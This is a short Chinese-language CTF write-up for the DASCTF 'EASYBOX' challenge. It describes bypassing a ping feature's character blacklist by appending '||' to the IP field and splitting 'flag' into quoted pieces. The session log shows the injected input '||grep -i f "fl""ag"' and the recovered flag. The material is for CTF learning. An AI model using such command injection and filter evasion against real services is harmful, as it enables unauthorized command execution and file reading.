DASCTF月赛 - EASYBOX | RocketDevlog

标题: DASCTF月赛 - EASYBOX
作者: RocketDev
创建于: 2023-12-03 12:00:00
更新于: 2024-07-25 12:34:56
链接: https://rocketmadev.github.io/2023/12/03/EASYBOX/
版权声明: 本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0 进行许可。

From CBCTF x DASCTF

文件分析

下载easybox, NX on, PIE off, Canary on, RELRO partial
ghidra分析为64位程序

解题思路

pingCommand虽然ban了很多字符，但是我们仍可以通过拼接字符串来绕过sh, cat和flag

通过||操作符忽略错误继续执行；
先ls /bin看看有什么可以利用的程序，发现有grep；
grep同样可以打印文件；
"fl""ag"可以把flag拼起来；
最后用catCommand查看result.txt就可以了

EXPLOIT

nc node4.buuoj.cn 26927
 _____    _    ______   ______   _____  __
| ____|  / \  / ___\ \ / / __ ) / _ \ \/ /
|  _|   / _ \ \___ \\ V /|  _ \| | | \  /
| |___ / ___ \ ___) || | | |_) | |_| /  \
|_____/_/   \_\____/ |_| |____/ \___/_/\_\
Canary value saved to canary.txt.
Welcome to the EASYBOX
Please enter your name: yes
Hello! yes
yes@EASYBOX:/home/ctf$ PING
Enter an IP address: ||grep -i f "fl""ag"
sh: 1: ping: not found
Ping result has been saved in /tmp/result.txt
yes@EASYBOX:/home/ctf$ CAT
Enter the filename to view: result.txt
DASCTF{faf97940-0fc1-40af-a539-2ac02898e155}

yes@EASYBOX:/home/ctf$ EXIT
Exiting the program...

Done.